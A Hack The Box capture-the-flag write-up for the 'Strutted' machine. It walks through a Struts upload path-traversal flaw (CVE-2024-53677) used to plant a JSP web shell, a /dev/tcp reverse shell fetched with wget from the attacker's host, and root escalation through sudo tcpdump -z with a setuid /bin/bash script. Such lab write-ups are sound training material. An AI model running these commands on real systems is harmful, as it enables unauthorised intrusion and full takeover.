# Strutted (HTB)
## Intro
Hello my lovely fellows Today new day and new machine let's jump into it.
## Enumeration
### Port scanning.
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Did not follow redirect to http://strutted.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Classic 80,22 machine. Let's check what does the website have for us.
### Website enumeration.
Once we enter the website we going to see this upload functionality.
There is a lot a way to download the application. Let's download and see what we have there before we go and test this.
First thing we see a tomcat user. I did some Directory brute-force as well as sub domain enumeration but nothing was there.
### CVE-2024-53677
After looking in the source code a bit i came across this version of `Struts` which used in the application backend. Looking around the internet of its version
```
UTF-817176.3.0.19.4.46.v20220331true2.14.12.14.1
```
We going to find this.
{% embed url="" %}
It has a known CVE. Which is basically a flow in the uploading mechanism allow the attacker path traversal and in some cases file upload.
## Shell as tomcat
So basically the vulnerability allow us to upload file and via implementation error in `FileUploadIntercepto`\` we can upload file and traversal the system to choose where this file will live on the disk. This is how we can exploit it..
1. First we need to capture an upload request via `burp suit` or what ever proxy you using.
2. Then we need to trick it into think that the uploaded is a sort of image `gif` `png` `jpg` etc..
3. After we do that we going to abuse the `top.UploadFileName` which will allow us to place the upload file into where ever we want into the disk.
4. We use the payload ....
Here is the sloution.
i used this payload
{% embed url="" %}
Here we tricking the server into thinking this is a `gif` . Also notice that we change the case for the `upload` name.
Here we choose where we put the file. Two step back to place it into the the root directory for it to be easily accessible. And simply using this `curl` command we can execute shell commands on the server
```bash
curl 'http://strutted.htb/shell.jsp?action=cmd&cmd=id'
```
from here you can do what ever you want to get shell as for me i did it this way.
1. Open python server and host a revers shell
2. use `wget` on the target machine and upload it into the server
3. change its permissions
4. execute it.
This is the payload i hosted.
```bash
sh -i >& /dev/tcp/10.10.16.111/9001 0>&1
```
For the python server
```bash
python3 -m http.server
```
This is the `wget` command. and the other commands
```bash
Documents/hackTheBox/Strutted via v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=wget http://10.10.16.111:9090/shell -O /tmp/shell"
GIF87a
Documents/hackTheBox/Strutted via v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=ls /tmp"
GIF87a
hsperfdata_tomcat
shell
sqlite-3.47.1.0-7dc50d4f-631b-491f-8888-643f936c6614-libsqlitejdbc.so
sqlite-3.47.1.0-7dc50d4f-631b-491f-8888-643f936c6614-libsqlitejdbc.so.lck
Documents/hackTheBox/Strutted via v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=chmod +x /tmp/shell"
GIF87a
Documents/hackTheBox/Strutted via v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=bash /tmp/shell"
504 Gateway Time-out
504 Gateway Time-out
nginx/1.18.0 (Ubuntu)
```
And here is out shell.
## Shell as james.
From there we just go into the `conf` file we going to find `tomcat-users.xml` which include a password.
This is what we looking for.
### Funny thing.
For Some odd reasons when you tried to `su` from the web shell into the user `james` it does not work so i did not bother to check from ssh first because i thought it was wrong in the beginning, when i lost hope i tried there and it just worked .... <:)
Anyway. And if you ask how did i found the user `james` just check the `/etc/passwd` file.
## Shell as Root.
the process the get shell as root was surprisingly easy i really did not excepted to be this way so am not going to spend much time.
use `sudo -l` to find what extra permissions you have.
Using the classic website `gtfobins` we can find a way to get root.
{% embed url="" %}
Simply we abusing a flag `-z` which will execute some script after it finish the logging process.
As you may expect now just create a script that do for example change the permission of `/bin/bash` and add `sbit` into it. And execute it to be root.
{% hint style="success" %}
If you wondering what is `sbit` is just an extra bit in the permissions that state whomever execute this file will get the same permissions as the file owner so guess what if /bin/bash is own by root and it got `sbit` then it will be executed as root and we will get shell as root.
{% endhint %}
This is the exploit i used.
```bash
#!/bin/bash
chmod 4777 /bin/bash
```
and just simply run this command.
```bash
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z -Z root
```
Replace the path with the path to your exploit.
and in my case i just check the `/bin/bash` and i saw this.
But be careful. if you just execute it like that, New Linux machines will drop the permissions for no reason so you need to use the flag `-p` to avoid that.
## Closing.
And here you have it a quick and easy machine. The initial access was interesting i will be writing an exploit for it soon as more of a practice but for now enjoy your rest of the day... :thumbsup:
